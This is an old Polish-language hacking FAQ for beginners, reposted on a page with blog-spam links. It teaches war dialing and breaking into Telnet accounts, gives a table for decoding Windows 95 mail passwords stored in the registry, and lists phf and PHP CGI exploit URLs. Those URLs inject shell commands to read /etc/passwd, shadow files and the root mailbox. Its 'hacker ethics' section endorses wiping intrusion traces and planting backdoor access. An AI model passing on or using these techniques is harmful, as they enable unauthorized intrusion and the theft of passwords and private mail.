ďťż

Blog literacki, portal erotyczny - seks i humor nie z tej ziemi



TO FAQ SLUZY JEDYNIE DO CELOW EDUKACYJNY. NIE MA ONO CO PRAWDA
ZBYT WIELE WSPOLNEGO Z HACKERSTWEM i JEST ONO PRZEZNACZONE DLA
T O T A L N Y C H T O T A L N Y C H L A M E R O W. DLATEGO PROSZE PRAWDZIWYCH
HACKEROW O NIE CZYTANIE TEGO TEXTU.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ROLA's FAQ bEtA v.1
WEB SITE: HaCk PArAdIsE - http://friko2.onet.pl/po/rola
E - Mail: rola@friko2.onet.pl rola@kki.net.pl

WHAT DO YOU WANT TO HACK TODAY ?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Spis treści:
A) Start
B) Etyka Hackera
C) Kiedy i gdzie zacząć hacking
D) Polecenia telnetu
E) Polecenia UNIXA
F) Wszystko za friko
G) Bugi w Windows
H) Dziury w www
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

A.Start

Pierwsza wazna rzecza, ktora musisz zrobic to sciagnac ZIP'a.
Prawie wszystko co "sciagasz" przez internet lub BBS jest spakowane Zipem.
Pliki takie maja rozszerzenie ".zip".
Pozniej powinienes zdobyc dobry 'prefix scanre'.(znay rowniez po nazwa
War Dialer). Jest to progrma ktory automatycznie wybiera numer zaczynajacy sie
trzema nemerami (prefix'em) ktory wybrales. Spawdza on muner polaczenia posrednika.
(seria beep'ow ktore mowia, ze polaczyles sie z komputerem). Sprobuj i znajdz
duze biznesowe pole prefix'ow do sprawdzenia. Biznes ma interesujace komputery.
Znajduje sie tam wiele interesujacych programow scanujacych - polecam Autoscan
lub A-Dial. Sa proste w uzyciu czyniac prace efektywna i szybka.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

B. Etyka hackera

1.Hacker nie posługuje się wirusami.
Jedynym powodem eksperymentowania z nimi jest chęć poznania
sposobu ich działania.Hacker nie włamuje się dla osiągnięcia korzyści, innych niż
poszerzenie swojej wiedzy.

2.Hacker nie modyfikuje danych w systemach do których się włamał.
Dopuszczalne są wyjątki:
- zmiana zapisów systemowych, aby wejście do systemu pozostało nie zauważone
- naprawy uszkodzonych plików
- korekty w plikach użytkownika w celu zapewnienia sobie
dostępu w przyszłości

3.Hacker dzieli się swoją wiedzą. Chce, aby ludzie poznawali luki w
systemach zabezbieczeń i mogli je naprawiać (a nie wykorzystać).
Hacker pomaga tym którzy pomagają sobie. Tzn. jeżeli ktoś cięzko
się napracował i nadal sobie nie radzi, hacker wyciągnie do niego pomocną
dłoń. Chociaż hacker może łamać ustawowe prawo, nie złamie zasady
etyki. Wejdzie nielegalnie do systemu ale będzię działał tylko na jego korzyść.

4.Hacker płaci za oprogramowanie komercyjne i nie korzysta
z pirackich kopii. :-)))

5.Hacker wie że iformacja powinna być powszechnie dostępna
ale respektuje prawo do poufności informacji prywatnych.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

C. Kiedy i gdzie zacząć hacking ?

Kiedy juz staniesz sie posiadaczem dobrego scanera, scanuj prefix'y i znajdz
jakies ciekawa polaczenia, w nasptepujacy sposob. Od twojego terminalu, numer
polaczenia ktore znalazles. Powinienes uslyszec serie beep'ow (posrednika),
ktore swiadcza o tym ze polaczyes sie z obcym komputerem. Powinni brzmiec to
mniej wiecej tak "connect 9600" a nastepnie indentyfikacji systemu do ktorego
sie dostales. Jezeli nic sie nie stalo po uslyszeniu 'connect 9600" sprobuj
nawiazac do tego wejscia kilkakrotnie. Kiedy wystapia zaklocenia w czasie transmisji
dostosuj parametry modemu: predkasc, dane bity, transfer w bodach, etc,
do wartosci poprawnych.
Jest to jeden ze sposobow na uzyskanie polacznia z odleglym komputerem.
Innym jest polaczenie sie poprzez Telnet lub tego typu siec.
Telnet jest ogromna siecia, ktora skupia w sobie inne sieci i podlaczone
terminale.
A oto jak sie podlaczyc z odleglym komputerwm porzez Telnet:
Po pierwsze, wybierz numer polaczenia lokalnego(nr. telefoniczny) z listy
ktora przedstawilem w sekcji G. Wykrec numer telefoniczny z twojego terminala
i polacz sie.( jezeli dostale komunikat mowiacy o bledach polaczenia sprobuj
zmienic bit parzystosc na nieparzysty w danych bit na 7, to powinno wystarczyc)
Jezeli wszystko jest w porzadku wcisnij enter i odczekaj kilka sekund, potornie
nacisnij enter.Nastepnie ukaze sie napis "TERMINAL=" ,napisz o emulacji
swojego terminalu. Jezeli nie wiesz jaki jest nacisnj enter. Ujrzysz prompt
ktory powinnien wygladac w ten sposob "@".Napisz "c" i NUA (Network User
Address), z ktorym chcesz sie polaczyc.Kiedy juz sie polaczysz z NUA, pierwsza
rzecza, ktora powinienes zrobic jest sprawdzenie typu systemu z jakim sie
polaczyles (np. UNIX, VAX/VMS, PRIME, etc.)
Jest jeszcze kilka spraw, ktore powineniens zrobic operujac w Telnecie
zanim polaczysz sie z NUA. Nie ktore z tych komend i polecen sa opisane w
kolnej sekcji.
Mozesz polaczyc sie wylacznie z komputerem, ktory akceptuje wsteczne
polaczenie. Jedynym sposobem polacenia z koputerem, ktory nie akceptuje
revers charging jest posiadanie telnetowego konta. Mozesz sprobowac wlamc
sie do niego. Aby to zrobic po promcie "@" napisz "access".Powinna pokazac
sie prosba o podanie Telnetowego ID i hasla.
Telnet prawdopodobnie jest najbezpieczniejszym miejscem do rozpoczecia
hakerowania poniewaz masz do wyboru wiele miejsc, z ktorymi mozesz sie
polaczyc. Upewnij sie ze dzwonisz w czasie pracy (poznym rankiem lub wczesnym
popoludniem) wtedy jest najwiecej ludzi w sieci.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

D. Polecenia Tenetu.

Oto lista niktorych polecen Telnetu i ich znaczenie. Rzecz jansa jest
to niewielki ulamek wszystkich polecen. Poczatkujacym nie wolno uzywac
niektorych polecen, umiscilem je do wiadomosci ze istnija.

Polecenie Znaczenie

c polaczenie z hostem
stat wykaz portow sieciowych
full network echo
half terminal echo
telemail poczta (potrzebne ID i haslo)
mail "
set wybor parametrow PAD
cont kontynuuj
d zerwanie polaczenia
hangup zawieszenie
access konto telnetowe (ID i haslo)

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

E. Polecenia unixa

cat - przeglada plik jak view. np: cat /etc/passwd ;)
chmod [mode] [plik] - zmiana dostepow do pliku.
chown [nick] [plik] - zmiana wlasciciela pliku.
cd [dir] - zmiana katalogu, cd .. cofanie sie o katalog
cp [plik] [plik] - kopiowanie z nowa nazwa.
diff [plik] [plik] - pokazywanie roznicy miedzy dwoma plikami.
-b -ignoruj puste miejsca
find [skad_zaczac] -name [nazwa] - poszukiwanie plikow np: find / -name passwd
finger [username] - informacje o uzytkowniku. Mozna tez z zewnatrz finger user@server.pl
gcc plik - kompilacja
grep [wyraz] [nazwa pliku] - przeszukiwanie plikow za jakims wyrazem.
help - pomoc
irc - uruchomienie klijenta irc.
kill - ma powiazania z ps , moze zabijac procesy w pamieci korzystjac z numeru PID.(patrz ps) $ kill -9 123 [123]: killed mozna tez zabic siebie "kill -1 0" ls - listowanie plikow ls -l daje wiecej info o plikach i katalogach.
man [komenda] - pomoc w konkretnej komendzie.
mail - czytanie poczty
mkdir [katalog] - tworzenie nowego katalogu.
mv [plik] [plik] - zmiana nazwy pliku, lub przeniesienie do innego katalogu.
passwd - zmiana hasla.
ps - pokazuje co robisz w pamieci i jaki to ma numer (PID)
PID TTY NAME 122 001 ksh 123 001 watch pwd - pokazuje w jakim jestesmu katalogu.
rm [plik] - kasuje plik
rmdir [katalog] - kasuje katalog gdy jest pusty.
rwho - to samo co who.
screen - dopalanie procesu w tle, np: by zostawic ircbota.
tar -xvf 8.tar - roztarowywanie pliku.
who - wypisuje info o zalogowanych uzytkownikach.
write [login] - pisanie do innego zalogowanego uzytkownika.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

E. Wszystko za friko.

W internecie jest wiele rzeczy za ktore nie trzeba placic np. e-maile,
strony www, konta telnetowe, i cracki ( programy dzieki ktorym zamieniamy
dema i wersje testowe programów w pelnowartosciowe oprogramowanie).
Podam tu kilka adresów stron www na ktorych mozna sie czegos o
tym dowiedziec:


W W W i E - M A I L

POLBOX - najpopularniejszy w polsce serwer darmowych kont i stron.
konto 1MB strona 2MB (adres strony w nastepujacej postaci polbox.com./A/AAA)
polbox.com
Ocena @ @ @ @
FRIKO ONET - serwer firmy OPTIMUS NET konto 2MB strona 2MB
(adres w postaci friko.onet.pl/2 litery nazwy woj./identyfikator)
friko.onet.pl
Ocena @ @ @ @ @
KKI - konto i strona 3MB do podziału
kki.net.pl
Ocena @ @ @ @
GEOCITIES - najpopularniejszy na swicie serwer darmowych kont i stron
geocities.com
Ocena @ @ @ @

T E L N E T
nyx.net login: new
gnx.com login: new

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

G.SHIT95 ma w sobie takie gowno jak rejestry !!! W rejestrach W95 znajduje sie
wiekszosc ustawien systemu, logi programow HASLA itd !!! Tak sie akurat
sklada, ze Internet Mail z pakietu Internet Explorer wpisuje tam haslo
ostatnio otwieranego konta E-mail !!! No to sprobojmy wyciagnac te haslo !!!
Lecz wpierw zaczne od podstaw !!! Plik rejestru mozna zrobic wpisujac
/regedit /e C:\xxx.reg w URUCHOM !!! Na dysku C: zostanie utworzony plik z
calym rejestrem W95 bedzie on mial grubo ponad 1MB !!! Haslo bedzie wpisane
prawie na koncu tego pliku pod tekstem "Account". Mozna je znalezc tez w inny
sposob !!! Uruchom program REGEDIT.EXE i Przejdz do
[HKEY_USERS\.Default\Software\Microsoft\Internet Mail and News\Mail\POP3\..]
w miejscu kropek bedzie wpisany serwer POP3 np. polobx.com, a w nim zobaczysz
haslo oczywiscie po tekscie Password !!! Jak juz zauwazyles Haslo to jest
zaszyfrowany :( !!! Teraz przyjdzie kolej na najtrudniejszą czesc artykulu.
Metoda rozszyfrowania tego hasla !!! Troche to skomplikowane, wiec bedziesz
musial nad tym posiedziec !!! No to zaczynam !!! TABELA !!!

SP=SPACE
L2=II Litera
---------------------------------------------------------------------------.
I Litera | II Litera | III Litera | IV Litera | V Litera | VI LITERA |
aa,bb | | | ,cc | dd, | |
| | | | | |
SP49,47 | 42 -4 do bb | 67 -1 do L2| ..,49,41 | 41 +2 do cc |Tak jak przy|
! 49,57 | 46 -4 do bb | 68 -1 do L2| ..,49,51 | 45 +2 do cc |III literze,|
" 49,6d | 4a -4 do bb | 69 -1 do L2| ..,49,67 | 49 +2 do cc |tylko ze od |
# 49,32 | 4e -4 do bb | 6a -1 do L2| ..,49,77 | 4d +2 do cc |@ do { +1 do|
$ 4a,47 | 52 -4 do bb | 6b -1 do L2| ..,4a,41 | 51 +2 do cc |V litery !! |
% 4a,57 | 56 -4 do bb | 6c -1 do L2| ..,4a,51 | 55 +2 do cc |------------|
& 4a,6d | 5a -4 do bb | 6d -1 do L2| ..,4a,67 | 59 +2 do cc | VII LITERA |
' 4a,32 | 64 -4 do bb | 6e -1 do L2| ..,4a,77 | 63 +2 do cc | |
( 4b,47 | 68 -4 do bb | 6f -1 do L2| ..,4b,41 | 67 +2 do cc |Tak jak przy|
) 4b,57 | 6c -4 do bb | 70 -1 do L2| ..,4b,51 | 6b +2 do cc |IV literze. |
* 4b,6d | 70 -4 do bb | 71 -1 do L2| ..,4b,67 | 6f +2 do cc |------------.
+ 4b,32 | 74 -4 do bb | 72 -1 do L2| ..,4b,77 | 73 +2 do cc | VIII LITERA|
, 4c,47 | 78 -4 do bb | 73 -1 do L2| ..,4c,41 | 77 +2 do cc | |
- 4c,57 | 31 -4 do bb | 74 -1 do L2| ..,4c,51 | 30 +2 do cc |Tak jak przy|
. 4c,6d | 35 -4 do bb | 75 -1 do L2| ..,4c,67 | 34 +2 do cc |V literze. |
/ 4c,32 | 39 -4 do bb | 76 -1 do L2| ..,4c,77 | 38 +2 do cc |------------.
0 4d,47 | 42 -3 do bb | 77 -1 do L2| ..,4d,41 | 41 +3 do cc | .
1 4d,57 | 46 -3 do bb | 78 -1 do L2| ..,4d,51 | 45 +3 do cc | .
2 4d,6d | 4a -3 do bb | 79 -1 do L2| ..,4d,67 | 49 +3 do cc | .
3 4d,32 | 4e -3 do bb | 7a -1 do L2| ..,4d,77 | 4d +3 do cc | .
4 4e,47 | 52 -3 do bb | 30 -1 do L2| ..,4e,41 | 51 +3 do cc | .
5 4e,57 | 56 -3 do bb | 31 -1 do L2| ..,4e,51 | 55 +3 do cc | .
6 4e,6d | 5a -3 do bb | 32 -1 do L2| ..,4e,67 | 59 +3 do cc | .
7 4e,32 | 64 -3 do bb | 33 -1 do L2| ..,4e,77 | 63 +3 do cc |
8 4f,47 | 68 -3 do bb | 34 -1 do L2| ..,4f,41 | 67 +3 do cc |
9 4f,57 | 6c -3 do bb | 35 -1 do L2| ..,4f,51 | 6b +3 do cc |
: 4f,6d | 70 -3 do bb | 36 -1 do L2| ..,4f,67 | 6f +3 do cc |
; 4f,32 | 74 -3 do bb | 37 -1 do L2| ..,4f,77 | 73 +3 do cc |
< 50,47 | 78 -3 do bb | 38 -1 do L2| ..,50,41 | 77 +3 do cc |
= 50,57 | 31 -3 do bb | 39 -1 do L2| ..,50,51 | 30 +3 do cc |
> 50,6d | 25 -3 do bb | 2b -1 do L2| ..,50,67 | 34 +3 do cc |
? 50,32 | 39 -3 do bb | 2f -1 do L2| ..,50,77 | 38 +3 do cc |
@ 51,47 | 42 -2 dp bb | 41 | ..,51,41 | 41 +4 do cc |
A 51,57 | 46 -2 do bb | 42 | ..,51,51 | 45 +4 do cc |
B 51,6d | 4a -2 do bb | 43 | ..,51,67 | 49 +4 do cc |
C 51,32 | 4e -2 do bb | 44 | ..,51,77 | 4d +4 do cc |
D 52,47 | 52 -2 do bb | 45 | ..,52,41 | 51 +4 do cc |
E 52,57 | 56 -2 do bb | 46 | ..,52,51 | 55 +4 do cc |
F 52,6d | 5a -2 do bb | 47 | ..,52,67 | 59 +4 do cc |
G 52,32 | 64 -2 do bb | 48 | ..,52,77 | 63 +4 do cc |
H 53,47 | 68 -2 do bb | 49 | ..,53,41 | 67 +4 do cc |
I 53,57 | 6c -2 do bb | 4a | ..,53,51 | 6b +4 do cc |
J 53,6d | 70 -2 do bb | 4b | ..,53,67 | 6f +4 do cc |
K 53,32 | 74 -2 do bb | 4c | ..,53,77 | 73 +4 do cc |
L 54,47 | 78 -2 do bb | 4d | ..,54,41 | 77 +4 do cc |
M 54,57 | 31 -2 do bb | 4e | ..,54,51 | 30 +4 do cc |
N 54,6d | 35 -2 do bb | 4f | ..,54,67 | 34 +4 do cc |
O 54,32 | 39 -2 do bb | 50 | ..,54,77 | 38 +4 do cc |
P 55,47 | 42 -1 do bb | 51 | ..,55,41 | 41 +5 do cc |
Q 55,57 | 46 -1 do bb | 52 | ..,55,51 | 45 +5 do cc |
R 55,6d | 4a -1 do bb | 53 | ..,55,67 | 49 +5 do cc |
S 55,32 | 4e -1 do bb | 54 | ..,55,77 | 4d +5 do cc |
T 56,47 | 52 -1 do bb | 55 | ..,56,41 | 51 +5 do cc |
U 56,57 | 56 -1 do bb | 56 | ..,56,51 | 55 +5 do cc |
V 56,6d | 5a -1 do bb | 57 | ..,56,67 | 59 +5 do cc |
W 56,32 | 64 -1 do bb | 58 | ..,56,77 | 63 +5 do cc |
X 57,47 | 68 -1 do bb | 59 | ..,57,41 | 67 +5 do cc |
Y 57,57 | 6c -1 do bb | 5a | ..,57,51 | 6b +5 do cc |
Z 57,6d | 70 -1 do bb | 5b | ..,57,67 | 6f +5 do cc |
[ 57,32 | 74 -1 do bb | 62 | ..,57,77 | 73 +5 do cc |
\ 58,47 | 78 -1 do bb | 63 | ..,58,41 | 77 +5 do cc |
] 58,57 | 31 -1 do bb | 64 | ..,58,51 | 30 +5 do cc |
^ 58,6d | 35 -1 do bb | 65 | ..,58,67 | 34 +5 do cc |
_ 58,32 | 39 -1 do bb | 66 | ..,58,77 | 38 +5 do cc |
` 59,47 | 42 | 67 | ..,59,41 | 41 +6 do cc |
a 59,57 | 46 | 68 | ..,59,51 | 45 +6 do cc |
b 59,6d | 4a | 69 | ..,59,67 | 49 +6 do cc |
c 59,32 | 4e | 6a | ..,59,77 | 4d +6 do cc |
d 5a,47 | 52 | 6b | ..,5a,41 | 51 +6 do cc |
e 5a,57 | 56 | 6c | ..,5a,51 | 55 +6 do cc |
f 5a,6d | 5a | 6d | ..,5a,67 | 59 +6 do cc |
g 5a,32 | 64 | 6e | ..,5a,77 | 63 +6 do cc |
h 61,47 | 68 | 6f | ..,61,41 | 67 +6 do cc |
i 61,57 | 6c | 70 | ..,61,51 | 6b +6 do cc |
j 61,6d | 70 | 71 | ..,61,67 | 6f +6 do cc |
k 61,32 | 74 | 72 | ..,61,77 | 73 +6 do cc |
l 62,47 | 78 | 73 | ..,62,41 | 77 +6 do cc |
m 62,57 | 31 | 74 | ..,62,51 | 30 +6 do cc |
n 62,6d | 35 | 75 | ..,62,67 | 34 +6 do cc |
o 62,32 | 39 | 76 | ..,62,77 | 38 +6 do cc |
p 63,47 | 42 +1 do bb | 77 | ..,63,41 | 41 +7 do cc |
q 63,57 | 46 +1 do bb | 78 | ..,63,51 | 45 +7 do cc |
r 63,6d | 4a +1 do bb | 79 | ..,63,67 | 49 +7 do cc |
s 63,32 | 4e +1 do bb | 7a | ..,63,77 | 4d +7 do cc |
t 64,47 | 52 +1 do bb | 30 | ..,64,41 | 51 +7 do cc |
u 64,57 | 56 +1 do bb | 31 | ..,64,51 | 55 +7 do cc |
v 64,6d | 5a +1 do bb | 32 | ..,64,67 | 59 +7 do cc |
w 64,32 | 64 +1 do bb | 33 | ..,64,77 | 63 +7 do cc |
x 65,47 | 68 +1 do bb | 34 | ..,65,41 | 67 +7 do cc |
y 65,57 | 6c +1 do bb | 35 | ..,65,51 | 6b +7 do cc |
z 65,6d | 70 +1 do bb | 36 | ..,65,67 | 6f +7 do cc |
{ 65,32 | 74 +1 do bb | 37 | ..,65,77 | 73 +7 do cc |
| 66,47 | 78 +1 do bb | 38 | ..,66,41 | 77 +7 do cc |
} 66,57 | 31 +1 do bb | 39 | ..,66,51 | 30 +7 do cc |
--------------------------------------------------------------.

ciag 47 | | ,77+7=33
57 | | ,67+7=6e
6d | ...
32 |
|
6d-2=6b |

Tak wyglada pelne uzupelnienie wolnego miejsca w hasle ..,3d,3d,0d,0a


A teraz przytocze kilka przykladow !!!
-------------
Haslo:HACK
Password:53 45 46 44 53 77 3d 3d 0d 0a

--
| |
-2 |
53 45 46 44 53 77 3d 3d 0d 0a
| | | | | | | |
----- | | --- ---------
| | | | |
|
H A C K .--- Uzupelnienie

53,45 a nie 53,47 w literze 1 bo druga Litera to A i odejmuje 2 z 47.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

H.1 phf - sciaganie passwd przez przegladarke :

Jeden ze starych sposobow:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
(dla lam: w miejsce xxx.xxx.xxx wpisujesz adres servera. ktory jest celem
ataku np free.polbox.pl)
Jesli hasla beda shadowane(!, * itd w miejscu hasel) to mozna sprobowac
/etc/shadow , ale male szanse, ze zadziala.

Ale lepiej uzyc kilku komend:

http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
=haqr&Qemail=&Qnickname=&Qoffice_phone=

Wykonaja one cos w tym stylu:

id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
(normal URL access to get the passwd file)
rm ~someuser/passwd

W ten sposob mozna nawet probowac czytac czyjas poczte. (np admina)
http://www.xxx.xxx.pl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/spool/mail/root
/...
lub tak
http://www.serwer.com/cgi-bin/phf.cgi?.../var/spool/mail/root
(http://www.serwer.com/cgi-bin/phf.cgi?.../var/spool/mail/username)
Na stronie faq znajdziecie program, ktory testuje bug'a w phf(phftest.exp).


2 php - Nowa dziura znaleziona przez DIS (16-04-97) :

Jest to dziura w skrypcie cgi z httpd (PHP/FI).
Pozwala ona na przegladanie plikow z servera.
a oto prosty przyklad:

http://xxx.xxx.pl/cgi-bin/php.cgi?/plik/do/przejrzenia

3 phpscan.c skaner php :
Jest to program skanujacy servery pod katem dziury w php.

phpscan domeny.txt wynik.txt

Tak jest na stronie faq ;)


4 phpget.c :

Jest to program, ktorym poprzez php mozesz sciagnac kilka ciekawych
plikow:

/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf

phpget

phpget www.lamers.com /etc/passwd


5 Vito.c - tester dziur servera http :
Jest to programi ktory laczy sie z serverem http poprzez port 80 i testuje
server pod katem wszelkich znanych dziur w http.
Jest w tym phf, php i pare dziur w cgi.
Spis dziur znajduje sie w pliku Vito.ini, mozna go edytowac.
Jak wszystko jest na stronie faq!



XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ROLA's FAQ beta v.1
WEB SITE: HaCk PArAdIsE - http://friko2.onet.pl/po/rola
E - Mail: rola@friko2.onet.pl rola@kki.net.pl

WHAT DO YOU WANT TO HACK TODAY ?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
All rights reserved

  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • qualintaka.pev.pl
  •